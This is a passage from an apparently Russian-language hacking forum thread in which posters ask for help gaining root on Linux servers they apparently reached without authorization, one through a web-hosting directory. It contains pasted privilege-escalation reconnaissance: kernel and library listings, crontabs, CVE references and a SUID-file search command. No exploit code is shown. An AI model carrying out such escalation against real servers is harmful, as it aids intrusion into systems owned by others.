Опробованы все эксплоиты из linuxprivchecker, компилятся почти все, не отрабатывает ни один (без ошибок,просто нет результата). Из того, что в чекере нет: система должна быть подвержена CVE 2014-0196 и 2014-3153, но под первый нет эксплоита на мою версию ядра, эксплоит под вторую не работает.

Нарыл две уязвимости этого года, но одна неюзабельна из-за отличающейся версии ОС, вторую (2015-3202) нет возможности проверить (чтобы узнать, сработало или нет, надо ждать логина в систему из-под рута. С таким админом его можно ждать вечно...).

Хелп.
[/B]

andrman

31.07.2015, 18:36

Подскажите пожалуйста по этому серверу

Code:
***********uname -a
Linux 2.6.32-431.29.2.el6.x86_64 #1 SMP Sun Jul 27 15:55:46 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux
**********ls -la /boot
total 80526
dr-xr-xr-x. 5 root root 3072 Jul 31 04:15 .
dr-xr-xr-x. 29 root root 4096 Jul 31 01:05 ..
-rw-r--r-- 1 root root 171 Jul 27 2014 .vmlinuz-2.6.32-431.29.2.el6.x86_64.hmac
-rw-r--r-- 1 root root 171 Mar 10 17:05 .vmlinuz-2.6.32-504.16.2.el6.x86_64.hmac
-rw-r--r-- 1 root root 171 May 29 10:21 .vmlinuz-2.6.32-504.23.4.el6.x86_64.hmac
-rw-r--r-- 1 root root 2519815 Jul 27 2014 System.map-2.6.32-431.29.2.el6.x86_64
-rw-r--r-- 1 root root 2545609 Mar 10 17:05 System.map-2.6.32-504.16.2.el6.x86_64
-rw-r--r-- 1 root root 2545975 May 29 10:21 System.map-2.6.32-504.23.4.el6.x86_64
-rw-r--r-- 1 root root 105200 Jul 27 2014 config-2.6.32-431.29.2.el6.x86_64
-rw-r--r-- 1 root root 106313 Mar 10 17:05 config-2.6.32-504.16.2.el6.x86_64
-rw-r--r-- 1 root root 106371 May 29 10:21 config-2.6.32-504.23.4.el6.x86_64
drwxr-xr-x. 3 root root 1024 Oct 25 2013 efi
drwxr-xr-x. 2 root root 1024 Jul 21 01:48 grub
-rw------- 1 root root 17153340 Nov 6 2014 initramfs-2.6.32-431.29.2.el6.x86_64.img
-rw------- 1 root root 19351653 Jun 10 03:45 initramfs-2.6.32-504.16.2.el6.x86_64.img
-rw------- 1 root root 19354839 Jul 21 01:48 initramfs-2.6.32-504.23.4.el6.x86_64.img
-rw------- 1 root root 5598321 Apr 28 02:44 initrd-2.6.32-431.29.2.el6.x86_64kdump.img
drwx------. 2 root root 12288 Oct 25 2013 lost+found
-rw-r--r-- 1 root root 193945 Jul 27 2014 symvers-2.6.32-431.29.2.el6.x86_64.gz
-rw-r--r-- 1 root root 200317 Mar 10 17:06 symvers-2.6.32-504.16.2.el6.x86_64.gz
-rw-r--r-- 1 root root 200210 May 29 10:22 symvers-2.6.32-504.23.4.el6.x86_64.gz
-rwxr-xr-x 1 root root 4132336 Jul 27 2014 vmlinuz-2.6.32-431.29.2.el6.x86_64
-rwxr-xr-x 1 root root 4153296 Mar 10 17:05 vmlinuz-2.6.32-504.16.2.el6.x86_64
-rwxr-xr-x 1 root root 4154992 May 29 10:21 vmlinuz-2.6.32-504.23.4.el6.x86_64
***************lls -la --full-time /lib
sh: lls: command not found
*********************ls -la --full-time /lib
total 3760
dr-xr-xr-x. 13 root root 4096 2015-07-21 01:47:08.711114108 -0400 .
dr-xr-xr-x. 29 root root 4096 2015-07-31 01:05:31.931316783 -0400 ..
drwxr-xr-x. 3 root root 4096 2015-01-12 08:24:24.000000000 -0500 alsa
lrwxrwxrwx 1 root root 14 2015-01-22 01:39:24.006519825 -0500 cpp -> ../usr/bin/cpp
drwxr-xr-x. 3 root root 4096 2015-01-22 01:41:16.608712599 -0500 crda
drwxr-xr-x. 44 root root 12288 2015-07-21 01:45:25.921755167 -0400 firmware
drwxr-xr-x. 3 root root 4096 2015-05-20 16:46:40.000000000 -0400 i686
drwxr-xr-x. 6 root root 4096 2013-10-25 03:57:52.000000000 -0400 kbd
-rwxr-xr-x 1 root root 141140 2015-05-20 17:12:39.000000000 -0400 ld-2.12.so
lrwxrwxrwx 1 root root 10 2015-07-21 01:47:08.518117237 -0400 ld-linux.so.2 -> ld-2.12.so
-rwxr-xr-x 1 root root 7220 2015-05-20 17:12:36.000000000 -0400 libBrokenLocale-2.12.so
lrwxrwxrwx 1 root root 23 2015-07-21 01:47:08.519117221 -0400 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
-rwxr-xr-x 1 root root 20372 2015-05-20 17:12:40.000000000 -0400 libSegFault.so
-rwxr-xr-x 1 root root 13412 2015-05-20 17:12:39.000000000 -0400 libanl-2.12.so
lrwxrwxrwx 1 root root 14 2015-07-21 01:47:08.521117189 -0400 libanl.so.1 -> libanl-2.12.so
-rwxr-xr-x 1 root root 1902892 2015-05-20 17:12:38.000000000 -0400 libc-2.12.so
lrwxrwxrwx 1 root root 12 2015-07-21 01:47:08.641115242 -0400 libc.so.6 -> libc-2.12.so
-rwxr-xr-x 1 root root 190988 2015-05-20 17:12:37.000000000 -0400 libcidn-2.12.so
lrwxrwxrwx 1 root root 15 2015-07-21 01:47:08.651115080 -0400 libcidn.so.1 -> libcidn-2.12.so
-rwxr-xr-x 1 root root 38376 2015-05-20 17:12:40.000000000 -0400 libcrypt-2.12.so
lrwxrwxrwx 1 root root 16 2015-07-21 01:47:08.653115048 -0400 libcrypt.so.1 -> libcrypt-2.12.so
-rwxr-xr-x 1 root root 17892 2015-05-20 17:12:37.000000000 -0400 libdl-2.12.so
lrwxrwxrwx 1 root root 13 2015-07-21 01:47:08.655115016 -0400 libdl.so.2 -> libdl-2.12.so
-rw-r--r-- 1 root root 899 2015-01-28 17:12:07.000000000 -0500 libfreebl3.chk
-rwxr-xr-x 1 root root 9604 2015-01-28 17:12:06.000000000 -0500 libfreebl3.so
-rw-r--r-- 1 root root 899 2015-01-28 17:12:07.000000000 -0500 libfreeblpriv3.chk
-rwxr-xr-x 1 root root 378504 2015-01-28 17:12:06.000000000 -0500 libfreeblpriv3.so
-rwxr-xr-x 1 root root 120672 2014-09-01 09:11:34.000000000 -0400 libgcc_s-4.4.7-20120601.so.1
lrwxrwxrwx 1 root root 28 2015-01-22 01:41:30.798484873 -0500 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
-rwxr-xr-x 1 root root 200024 2015-05-20 17:12:36.000000000 -0400 libm-2.12.so
lrwxrwxrwx 1 root root 12 2015-07-21 01:47:08.667114822 -0400 libm.so.6 -> libm-2.12.so
-rwxr-xr-x 1 root root 113908 2015-05-20 17:12:39.000000000 -0400 libnsl-2.12.so
lrwxrwxrwx 1 root root 14 2015-07-21 01:47:08.674114708 -0400 libnsl.so.1 -> libnsl-2.12.so
-rwxr-xr-x 1 root root 40196 2015-05-20 17:12:35.000000000 -0400 libnss_compat-2.12.so
lrwxrwxrwx 1 root root 21 2015-07-21 01:47:08.677114659 -0400 libnss_compat.so.2 -> libnss_compat-2.12.so
-rwxr-xr-x 1 root root 25592 2015-05-20 17:12:40.000000000 -0400 libnss_dns-2.12.so
lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.679114626 -0400 libnss_dns.so.2 -> libnss_dns-2.12.so
-rwxr-xr-x 1 root root 58704 2015-05-20 17:12:40.000000000 -0400 libnss_files-2.12.so
lrwxrwxrwx 1 root root 20 2015-07-21 01:47:08.682114578 -0400 libnss_files.so.2 -> libnss_files-2.12.so
-rwxr-xr-x 1 root root 22136 2015-05-20 17:12:37.000000000 -0400 libnss_hesiod-2.12.so
lrwxrwxrwx 1 root root 21 2015-07-21 01:47:08.684114546 -0400 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
-rwxr-xr-x 1 root root 49708 2015-05-20 17:12:37.000000000 -0400 libnss_nis-2.12.so
lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.687114497 -0400 libnss_nis.so.2 -> libnss_nis-2.12.so
-rwxr-xr-x 1 root root 58708 2015-05-20 17:12:38.000000000 -0400 libnss_nisplus-2.12.so
lrwxrwxrwx 1 root root 22 2015-07-21 01:47:08.690114448 -0400 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
-rwxr-xr-x 1 root root 131220 2015-05-20 17:12:35.000000000 -0400 libpthread-2.12.so
lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.698114318 -0400 libpthread.so.0 -> libpthread-2.12.so
-rwxr-xr-x 1 root root 103384 2015-05-20 17:12:39.000000000 -0400 libresolv-2.12.so
lrwxrwxrwx 1 root root 17 2015-07-21 01:47:08.705114205 -0400 libresolv.so.2 -> libresolv-2.12.so
-rwxr-xr-x 1 root root 39708 2015-05-20 17:12:36.000000000 -0400 librt-2.12.so
lrwxrwxrwx 1 root root 13 2015-07-21 01:47:08.708114156 -0400 librt.so.1 -> librt-2.12.so
-rwxr-xr-x 1 root root 31616 2015-05-20 17:12:41.000000000 -0400 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2015-07-21 01:47:08.710114124 -0400 libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 12788 2015-05-20 17:12:40.000000000 -0400 libutil-2.12.so
lrwxrwxrwx 1 root root 15 2015-07-21 01:47:08.710114124 -0400 libutil.so.1 -> libutil-2.12.so
drwxr-xr-x. 2 root root 4096 2013-10-25 13:09:41.000000000 -0400 lsb
dr-xr-xr-x. 5 root root 4096 2015-07-21 01:47:10.410086560 -0400 modules
drwxr-xr-x. 3 root root 4096 2015-07-21 01:47:08.730113800 -0400 rtkaio
drwxr-xr-x. 2 root root 4096 2014-07-17 11:36:23.000000000 -0400 security
drwxr-xr-x. 6 root root 4096 2013-10-25 03:57:01.000000000 -0400 terminfo
drwxr-xr-x. 5 root root 4096 2015-01-22 01:39:34.385353241 -0500 udev
********************mount
/dev/mapper/VolGroup-lv_root on / type ext4 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda1 on /boot type ext4 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/etc/named on /var/named/chroot/etc/named type none (rw,bind)
/var/named on /var/named/chroot/var/named type none (rw,bind)
/usr/lib64/bind on /var/named/chroot/usr/lib64/bind type none (rw,bind)
*************************df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup-lv_root
909G 587G 276G 69% /
tmpfs 16G 1.1G 15G 7% /dev/shm
/dev/sda1 243M 86M 145M 38% /boot
sh-4.1$ cat /etc/issue
cat /etc/issue
Red Hat Enterprise Linux Server release 6.6 (Santiago)
Kernel \r on an \m
*******************cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

****************ls -la cron.d
ls: cannot access cron.d: No such file or directory
*************ls -la cron.hourly
ls: cannot access cron.hourly: No such file or directory
**********************ls -la cron.monthly
ls: cannot access cron.monthly: No such file or directory
********************ls -la cron.weekly
ls: cannot access cron.weekly: No such file or directory
******************cat /proc/version
Linux version 2.6.32-431.29.2.el6.x86_64 (mockbuild@x86-026.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Sun Jul 27 15:55:46 EDT 2014
******************cat /proc/sys/vm/mmap_min_addr
4096
sh-4.1$ pwd
pwd
/var/www/vhost//httpdoc/lib
************ls -la /usr/bin/staprun
---s--x--- 1 root stapusr 183072 Jun 23 2014 /usr/bin/staprun
******************
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/nul
sh: /dev/nul: Permission denied

d4rk73rr0r

01.08.2015, 17:24

Подскажите пожалуйста, можно ли рутить этот сервер?

$ uname -a 2>&1

Code:
Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

$ ls -la /boot 2>&1

Code:
total 652860
drwxr-xr-x 3 root root 12288 Jun 20 08:15 .
drwxr-xr-x 24 root root 4096 Jun 16 08:07 ..
-rw------- 1 root root 3372643 May 3 2014 System.map-3.13.0-24-generic
-rw------- 1 root root 3378267 Jun 5 2014 System.map-3.13.0-29-generic
-rw------- 1 root root 3378641 Jul 5 2014 System.map-3.13.0-30-generic
-rw------- 1 root root 3381262 Jul 15 2014 System.map-3.13.0-32-generic
-rw------- 1 root root 3381262 Jul 29 2014 System.map-3.13.0-33-generic
-rw------- 1 root root 3381262 Aug 13 2014 System.map-3.13.0-34-generic
-rw------- 1 root root 3386444 Aug 15 2014 System.map-3.13.0-35-generic
-rw------- 1 root root 3386479 Sep 4 2014 System.map-3.13.0-36-generic
-rw------- 1 root root 3386945 Sep 23 2014 System.map-3.13.0-37-generic
-rw------- 1 root root 3386936 Oct 28 2014 System.map-3.13.0-39-generic
-rw------- 1 root root 3387231 Nov 13 2014 System.map-3.13.0-40-generic
-rw------- 1 root root 3388792 Nov 25 2014 System.map-3.13.0-41-generic
-rw------- 1 root root 3388760 Dec 9 2014 System.map-3.13.0-43-generic
-rw------- 1 root root 3388834 Dec 16 2014 System.map-3.13.0-44-generic
-rw------- 1 root root 3389458 Mar 11 01:43 System.map-3.13.0-46-generic
-rw------- 1 root root 3389235 Mar 12 16:52 System.map-3.13.0-48-generic
-rw------- 1 root root 3389437 Apr 11 02:05 System.map-3.13.0-49-generic
-rw------- 1 root root 3389875 Apr 15 18:03 System.map-3.13.0-51-generic
-rw------- 1 root root 3389875 May 4 10:09 System.map-3.13.0-52-generic
-rw------- 1 root root 3390132 May 20 16:11 System.map-3.13.0-53-generic
-rw------- 1 root root 3390881 May 27 01:11 System.map-3.13.0-54-generic
-rw------- 1 root root 3390881 Jun 18 06:03 System.map-3.13.0-55-generic
-rw-r--r-- 1 root root 1158016 May 3 2014 abi-3.13.0-24-generic
-rw-r--r-- 1 root root 1161764 Jun 5 2014 abi-3.13.0-29-generic
-rw-r--r-- 1 root root 1162257 Jul 5 2014 abi-3.13.0-30-generic
-rw-r--r-- 1 root root 1162712 Jul 15 2014 abi-3.13.0-32-generic
-rw-r--r-- 1 root root 1162712 Jul 29 2014 abi-3.13.0-33-generic
-rw-r--r-- 1 root root 1162712 Aug 13 2014 abi-3.13.0-34-generic
-rw-r--r-- 1 root root 1163858 Aug 15 2014 abi-3.13.0-35-generic
-rw-r--r-- 1 root root 1163858 Sep 4 2014 abi-3.13.0-36-generic
-rw-r--r-- 1 root root 1164489 Sep 23 2014 abi-3.13.0-37-generic
-rw-r--r-- 1 root root 1164547 Oct 28 2014 abi-3.13.0-39-generic
-rw-r--r-- 1 root root 1164509 Nov 13 2014 abi-3.13.0-40-generic
-rw-r--r-- 1 root root 1164720 Nov 25 2014 abi-3.13.0-41-generic
-rw-r--r-- 1 root root 1164720 Dec 9 2014 abi-3.13.0-43-generic
-rw-r--r-- 1 root root 1164720 Dec 16 2014 abi-3.13.0-44-generic
-rw-r--r-- 1 root root 1164852 Mar 11 01:43 abi-3.13.0-46-generic
-rw-r--r-- 1 root root 1164723 Mar 12 16:52 abi-3.13.0-48-generic
-rw-r--r-- 1 root root 1164723 Apr 11 02:05 abi-3.13.0-49-generic
-rw-r--r-- 1 root root 1164671 Apr 15 18:03 abi-3.13.0-51-generic
-rw-r--r-- 1 root root 1164671 May 4 10:09 abi-3.13.0-52-generic
-rw-r--r-- 1 root root 1164671 May 20 16:11 abi-3.13.0-53-generic
-rw-r--r-- 1 root root 1164806 May 27 01:11 abi-3.13.0-54-generic
-rw-r--r-- 1 root root 1164806 Jun 18 06:03 abi-3.13.0-55-generic
-rw-r--r-- 1 root root 165510 May 3 2014 config-3.13.0-24-generic
-rw-r--r-- 1 root root 165544 Jun 5 2014 config-3.13.0-29-generic
-rw-r--r-- 1 root root 165576 Jul 5 2014 config-3.13.0-30-generic
-rw-r--r-- 1 root root 165611 Jul 15 2014 config-3.13.0-32-generic
-rw-r--r-- 1 root root 165611 Jul 29 2014 config-3.13.0-33-generic
-rw-r--r-- 1 root root 165611 Aug 13 2014 config-3.13.0-34-generic
-rw-r--r-- 1 root root 165652 Aug 15 2014 config-3.13.0-35-generic
-rw-r--r-- 1 root root 165671 Sep 4 2014 config-3.13.0-36-generic
-rw-r--r-- 1 root root 165712 Sep 23 2014 config-3.13.0-37-generic
-rw-r--r-- 1 root root 165712 Oct 28 2014 config-3.13.0-39-generic
-rw-r--r-- 1 root root 165745 Nov 13 2014 config-3.13.0-40-generic
-rw-r--r-- 1 root root 165745 Nov 25 2014 config-3.13.0-41-generic
-rw-r--r-- 1 root root 165745 Dec 9 2014 config-3.13.0-43-generic
-rw-r--r-- 1 root root 165748 Dec 16 2014 config-3.13.0-44-generic
-rw-r--r-- 1 root root 165748 Mar 11 01:43 config-3.13.0-46-generic
-rw-r--r-- 1 root root 165773 Mar 12 16:52 config-3.13.0-48-generic
-rw-r--r-- 1 root root 165773 Apr 11 02:05 config-3.13.0-49-generic
-rw-r--r-- 1 root root 165762 Apr 15 18:03 config-3.13.0-51-generic
-rw-r--r-- 1 root root 165762 May 4 10:09 config-3.13.0-52-generic
-rw-r--r-- 1 root root 165762 May 20 16:11 config-3.13.0-53-generic
-rw-r--r-- 1 root root 165762 May 27 01:11 config-3.13.0-54-generic
-rw-r--r-- 1 root root 165762 Jun 18 06:03 config-3.13.0-55-generic
drwxr-xr-x 5 root root 4096 Jun 20 08:15 grub
-rw-r--r-- 1 root root 19692919 Jun 25 2014 initrd.img-3.13.0-24-generic
-rw-r--r-- 1 root root 19693496 Jun 25 2014 initrd.img-3.13.0-29-generic
-rw-r--r-- 1 root root 19802843 Jul 10 2014 initrd.img-3.13.0-30-generic
-rw-r--r-- 1 root root 19805892 Jul 30 2014 initrd.img-3.13.0-32-generic
-rw-r--r-- 1 root root 19806330 Aug 12 2014 initrd.img-3.13.0-33-generic
-rw-r--r-- 1 root root 19807084 Aug 14 2014 initrd.img-3.13.0-34-generic
-rw-r--r-- 1 root root 19814700 Aug 29 2014 initrd.img-3.13.0-35-generic
-rw-r--r-- 1 root root 19827146 Sep 23 2014 initrd.img-3.13.0-36-generic
-rw-r--r-- 1 root root 19826914 Oct 9 2014 initrd.img-3.13.0-37-generic
-rw-r--r-- 1 root root 19826798 Oct 30 2014 initrd.img-3.13.0-39-generic
-rw-r--r-- 1 root root 19831562 Nov 25 2014 initrd.img-3.13.0-40-generic
-rw-r--r-- 1 root root 19857194 Dec 11 2014 initrd.img-3.13.0-41-generic
-rw-r--r-- 1 root root 19858798 Dec 12 2014 initrd.img-3.13.0-43-generic
-rw-r--r-- 1 root root 19860064 Jan 13 2015 initrd.img-3.13.0-44-generic
-rw-r--r-- 1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic
-rw-r--r-- 1 root root 19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic
-rw-r--r-- 1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic
-rw-r--r-- 1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic
-rw-r--r-- 1 root root 19865264 May 7 08:07 initrd.img-3.13.0-52-generic
-rw-r--r-- 1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic
-rw-r--r-- 1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic
-rw-r--r-- 1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic
-rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin
-rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf
-rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin
-rw------- 1 root root 5776416 May 3 2014 vmlinuz-3.13.0-24-generic
-rw------- 1 root root 5792544 Jun 5 2014 vmlinuz-3.13.0-29-generic
-rw------- 1 root root 5792608 Jul 5 2014 vmlinuz-3.13.0-30-generic
-rw------- 1 root root 5798112 Jul 15 2014 vmlinuz-3.13.0-32-generic
-rw------- 1 root root 5798688 Jul 29 2014 vmlinuz-3.13.0-33-generic
-rw------- 1 root root 5797728 Aug 13 2014 vmlinuz-3.13.0-34-generic
-rw------- 1 root root 5806368 Aug 15 2014 vmlinuz-3.13.0-35-generic
-rw------- 1 root root 5806848 Sep 4 2014 vmlinuz-3.13.0-36-generic
-rw------- 1 root root 5808832 Sep 23 2014 vmlinuz-3.13.0-37-generic
-rw------- 1 root root 5808544 Oct 28 2014 vmlinuz-3.13.0-39-generic
-rw------- 1 root root 5808960 Nov 13 2014 vmlinuz-3.13.0-40-generic
-rw------- 1 root root 5814112 Nov 25 2014 vmlinuz-3.13.0-41-generic
-rw------- 1 root root 5814080 Dec 9 2014 vmlinuz-3.13.0-43-generic
-rw------- 1 root root 5814496 Dec 16 2014 vmlinuz-3.13.0-44-generic
-rw------- 1 root root 5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic
-rw------- 1 root root 5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic
-rw------- 1 root root 5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic
-rw------- 1 root root 5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic
-rw------- 1 root root 5818592 May 4 10:09 vmlinuz-3.13.0-52-generic
-rw------- 1 root root 5821152 May 20 16:11 vmlinuz-3.13.0-53-generic
-rw------- 1 root root 5821664 May 27 01:11 vmlinuz-3.13.0-54-generic
-rw------- 1 root root 5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic

ls -la --full-time /lib 2>&1

Code:
total 312
drwxr-xr-x 23 root root 4096 2015-02-27 08:01:04.121244740 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
drwxr-xr-x 2 root root 4096 2014-11-21 07:40:33.676606953 +0500 apparmor
lrwxrwxrwx 1 root root 21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp
drwxr-xr-x 3 root root 4096 2014-06-24 11:04:14.153311413 +0500 crda
drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware
drwxr-xr-x 2 root root 4096 2014-06-24 11:08:09.613305094 +0500 hdparm
drwxr-xr-x 2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu
drwxr-xr-x 2 root root 4096 2014-06-27 11:51:14.108394221 +0500 ifupdown
drwxr-xr-x 2 root root 4096 2014-07-30 11:27:25.309402444 +0500 init
-rwxr-xr-x 1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so
lrwxrwxrwx 1 root root 25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so
lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r-- 1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0
drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 lsb
drwxr-xr-x 2 root root 4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:17.752507007 +0500 modules
drwxr-xr-x 2 root root 4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d
drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 plymouth
drwxr-xr-x 3 root root 4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode
drwxr-xr-x 2 root root 4096 2014-06-27 11:51:03.188394514 +0500 resolvconf
drwxr-xr-x 2 root root 4096 2014-07-11 15:54:31.320044515 +0500 security
drwxr-xr-x 3 root root 4096 2014-07-10 17:19:11.242226794 +0500 systemd
drwxr-xr-x 15 root root 4096 2014-06-24 11:03:45.029312194 +0500 terminfo
drwxr-xr-x 4 root root 4096 2014-07-11 15:54:50.304044005 +0500 udev
drwxr-xr-x 2 root root 4096 2014-06-24 11:12:34.149297995 +0500 ufw
drwxr-xr-x 4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2014-06-24 11:08:13.173304998 +0500 xtables

ls -la --full-time /lib64 2>&1

Code:
total 8
drwxr-xr-x 2 root root 4096 2015-02-27 08:01:05.833244694 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
lrwxrwxrwx 1 root root 32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so

$ mount 2>&1

Code:
/dev/md0 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/md1 on /opt type ext4 (rw,usrquota)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)

$ df -h 2>&1

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/md0 459G 215G 221G 50% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
udev 3.8G 4.0K 3.8G 1% /dev
tmpfs 768M 1.8M 767M 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 3.8G 16K 3.8G 1% /run/shm
none 100M 0 100M 0% /run/user
/dev/md1 1.8T 48G 1.7T 3% /opt

$ cat /etc/issue 2>&1

Code:
Ubuntu 14.04.1 LTS \n \l

$ cat /etc/crontab 2>&1

Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

# ClamAV refresh virus databases
30 1 * * * root freshclam >/dev/null 2>&1

# ClamAV checking vhosts directory and sending email to admins
0 2 * * * root /adm/clamav.sh >/dev/null 2>&1

$ ls -la /etc/cron.d 2>&1

Code:
total 44
drwxr-xr-x 2 root root 4096 Apr 21 08:16 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rw------- 1 root root 260 Jul 11 2014 awstats
-rw-r--r-- 1 root root 1566 Feb 3 2014 mailman
-rw-r--r-- 1 root root 589 Feb 28 2014 mdadm
-rw-r--r-- 1 root root 510 Jul 7 2014 php5
-rw-r--r-- 1 root root 110 Jul 11 2014 plesk-backup-manager-task
-rw-r--r-- 1 root root 156 Aug 7 2014 plesk-outgoing-mail-statistics-poller

$ ls -la /etc/cron.hourly 2>&1

Code:
total 20
drwxr-xr-x 2 root root 4096 Jun 24 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder

$ ls -la /etc/cron.monthly 2>&1

Code:
total 24
drwxr-xr-x 2 root root 4096 Jul 11 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 190 Jun 25 2014 50plesk-monthly

$ ls -la /etc/cron.weekly 2>&1

Code:
total 40
drwxr-xr-x 2 root root 4096 Jul 11 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 189 Jun 25 2014 50plesk-weekly
-rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
-rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
-rwxr-xr-x 1 root root 771 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 211 Apr 10 2014 update-notifier-common

$ cat /proc/version 2>&1

Code:
